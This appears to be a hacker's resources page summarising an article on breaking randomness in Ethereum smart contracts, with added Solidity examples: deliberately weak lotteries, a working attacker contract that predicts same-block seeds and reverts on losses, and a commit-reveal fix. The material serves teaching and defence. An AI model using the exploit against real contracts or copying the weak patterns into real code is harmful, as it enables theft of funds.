Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Predicting Random Numbers in Ethereum Smart Contracts

Arseniy Reutov, posted 3 years ago
  • Randomness on a public blockchain is a known hard problem: every value a contract can read is also visible to everyone else, the miner included. Regardless, people keep rolling their own random functions, and keep failing. This article walks through how those functions are typically built and how each of them gets broken.
  • Many of them try to use block variables as the source of randomness: block.coinbase is the address of the miner of the block, block.number is the height of the current block, block.timestamp is the time the miner stamped on it, and so on. A miner, or anyone with enough hashing power, can influence some of these (the timestamp within limits, the coinbase outright) and can choose which block a transaction lands in.
  • Worse, the attacker does not need to be a miner at all. A contract that calls the lottery in the same transaction, and therefore in the same block, sees exactly the same block variables, so it can compute the "random" value first and simply revert when it would lose. The author shows examples based on SHA3 (keccak256) of the timestamp, of block.number, and of combinations of several block variables; all of them fall to this.
  • block.blockhash(n) (plain blockhash(n) in current Solidity) returns the hash of block n. Why is this bad as a seed? blockhash(block.number) always yields 0, because the hash of the block being mined is not known while its transactions execute. blockhash(block.number - 1) is a real value, but it is the same for every transaction in the block, so an attacker executing code in the same block computes it just as easily as the lottery does.
  • Wait, there is more! Storing the block number at bet time and reading its hash in a later transaction seems great, since the hash genuinely is unknown when the bet is placed. However, the EVM only keeps track of the most recent 256 block hashes; for anything older, blockhash() returns 0. If the draw transaction is sent more than 256 blocks after the bet, the "random" value becomes a constant the player can compute in advance. This is exactly what happened in the SmartBillions lottery.
  • Want to use the private modifier for a seed? That will not work either. private only stops other contracts from reading the variable; contract storage itself is public, and anyone can read it off-chain (for example with the eth_getStorageAt JSON-RPC call) and then craft a transaction that uses the seed.
  • In Ethereum, miners choose which pending transactions go into a block, and in what order, largely by the gas price each one offers. Hence an attacker can push their own transaction ahead of someone else's simply by paying a higher gas price. Any contract whose execution flow depends on a transaction's position in a block can be abused this way; the attack is called frontrunning.
  • The article has a great example of this being abused. A lottery could fetch its random number from an external oracle. An attacker watches the pool of pending transactions and waits for the oracle's callback carrying the random value. Because that transaction is visible before it is mined, the attacker reads the value, works out the winning bet, and submits it with a higher gas price so that it is mined before the callback lands.
  • How to fix this problem? Oraclize is a service that bridges distributed applications and the internet, so a contract can fetch randomness from an outside source (with a proof of where the data came from) instead of deriving it from block variables; bets still have to be closed before the oracle's answer arrives, or the frontrunning above applies. A few more mathematical schemes were mentioned as well, such as Signidice (the operator's deterministic signature over the player's input serves as the random value, so the operator cannot choose it and the player cannot predict it) and a commit-reveal approach (players first publish hashes of secrets, then reveal them, and the result is derived from all revealed secrets).
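The block-variable and blockhash weaknesses from the notes above, as an added Solidity example (my own illustration, not code from the article or from any real lottery): a lottery that seeds itself from block variables, an attacker contract that reproduces the seed inside the same block and only pays when it will win, and a bet-then-draw variant that trips over the 256-block blockhash window. All contract and function names, the ticket price and the payout are made up for this illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not taken from the article. Names and amounts are arbitrary.

contract WeakLottery {
    uint256 public constant TICKET = 0.01 ether;

    // The pattern the notes describe: keccak256 (SHA3) over block variables.
    // Every transaction mined in this block observes the same timestamp,
    // number and coinbase, so the result is not secret.
    function roll() public view returns (uint256) {
        return uint256(keccak256(abi.encodePacked(block.timestamp, block.number, block.coinbase))) % 10;
    }

    // Pays 5x the ticket when the roll is 7; otherwise keeps the ticket.
    function play() external payable {
        require(msg.value == TICKET, "wrong ticket price");
        if (roll() == 7) {
            payable(msg.sender).transfer(TICKET * 5);
        }
    }

    receive() external payable {}
}

// "Attacker executes code within the same block": a contract that calls the
// lottery in the same transaction sees identical block variables, so it can
// evaluate the outcome first and spend the ticket only on a winning draw.
contract Predictor {
    WeakLottery public immutable target;

    constructor(WeakLottery _target) {
        target = _target;
    }

    function attack() external payable {
        // Same formula, same block: identical result to WeakLottery.roll().
        uint256 predicted = uint256(keccak256(abi.encodePacked(block.timestamp, block.number, block.coinbase))) % 10;
        // A losing draw costs nothing but gas: revert before the ticket is spent.
        require(predicted == 7, "would lose; try again next block");
        target.play{value: msg.value}();
    }

    // Needed to receive the payout sent by WeakLottery.play().
    receive() external payable {}
}

// The SmartBillions-style mistake: the seed is the hash of a block that is
// still in the future at bet time, which is only sound if the draw happens
// within 256 blocks of the bet.
contract StaleHashLottery {
    struct Bet { uint256 blockNumber; uint8 pick; }
    mapping(address => Bet) public bets;

    function bet(uint8 pick) external payable {
        require(msg.value == 0.01 ether && pick < 10, "bad bet");
        bets[msg.sender] = Bet(block.number, pick);
    }

    function draw() external {
        Bet memory b = bets[msg.sender];
        require(b.blockNumber != 0 && block.number > b.blockNumber, "no bet or same block");
        delete bets[msg.sender];
        // blockhash() only covers the 256 most recent blocks. A player who
        // picks 0 and waits longer than that gets bytes32(0) here, so the
        // "random" draw is 0 and the bet is a guaranteed win.
        uint256 drawn = uint256(blockhash(b.blockNumber)) % 10;
        if (drawn == b.pick) {
            payable(msg.sender).transfer(0.05 ether);
        }
    }

    receive() external payable {}
}
```

Predictor.attack() is the whole attack against WeakLottery: call it in a loop from a script each block, and it reverts cheaply on every losing block and pays out on every winning one. The off-chain variant is the same computation done with the values of the pending block, which is why a private seed or a "no contracts allowed" check (extcodesize) does not rescue this design either.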
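The commit-reveal fix mentioned in the last note, as an added Solidity example (my own illustration, not code from the article or from Oraclize or Signidice): no block variable is used as entropy; players first publish a hash that binds them to a secret, reveal the secret once the commit phase is closed, and the winner is derived from every revealed secret. The contract name, the deposit amount and the phase lengths are arbitrary choices for this illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not taken from the article. Names and amounts are arbitrary.
contract CommitRevealDraw {
    uint256 public constant DEPOSIT = 0.01 ether;
    uint256 public immutable commitEnd;   // last block in which commit() is accepted
    uint256 public immutable revealEnd;   // last block in which reveal() is accepted

    mapping(address => bytes32) public commitments;
    address[] public revealers;           // players who actually revealed, in order
    bytes32 private mix;                  // running keccak256 over revealed secrets

    constructor(uint256 commitBlocks, uint256 revealBlocks) {
        commitEnd = block.number + commitBlocks;
        revealEnd = commitEnd + revealBlocks;
    }

    // Off-chain helper (use via eth_call): the player generates a secret
    // locally and commits keccak256(secret, address). Binding the address
    // stops another player from replaying the same commitment.
    function commitmentFor(uint256 secret, address player) external pure returns (bytes32) {
        return keccak256(abi.encodePacked(secret, player));
    }

    // Phase 1: only the hash goes on chain, so nobody learns the secret, and
    // the player cannot change it later without breaking the hash.
    function commit(bytes32 commitment) external payable {
        require(block.number <= commitEnd, "commit phase over");
        require(msg.value == DEPOSIT, "deposit required");
        require(commitments[msg.sender] == bytes32(0), "already committed");
        commitments[msg.sender] = commitment;
    }

    // Phase 2: the secret is revealed and checked against the commitment.
    // The deposit comes back only to players who reveal. `mix` is private but
    // readable from storage off-chain, so the last player can learn the
    // outcome early; all they can do with that is withhold their reveal,
    // which forfeits the deposit instead of being free.
    function reveal(uint256 secret) external {
        require(block.number > commitEnd && block.number <= revealEnd, "not reveal phase");
        bytes32 c = commitments[msg.sender];
        require(c != bytes32(0), "no commitment");
        require(keccak256(abi.encodePacked(secret, msg.sender)) == c, "secret does not match");
        delete commitments[msg.sender];            // one reveal per player
        mix = keccak256(abi.encodePacked(mix, secret));
        revealers.push(msg.sender);
        payable(msg.sender).transfer(DEPOSIT);
    }

    // Phase 3: the result is a function of all revealed secrets. No single
    // party can choose it, the miner contributes nothing to it, and the
    // commitment hashes give away nothing during the commit phase.
    function winner() external view returns (address) {
        require(block.number > revealEnd, "reveal phase not over");
        require(revealers.length > 0, "nobody revealed");
        return revealers[uint256(mix) % revealers.length];
    }
}
```

The deposit is the part people leave out: without it, the last revealer reads mix from storage, sees that they lose, and simply never reveals, which is a free re-roll. Deposits forfeited by non-revealers stay in the contract here; a real deployment would also decide who gets them and how long the phases are, since a short reveal window lets a miner censor reveals.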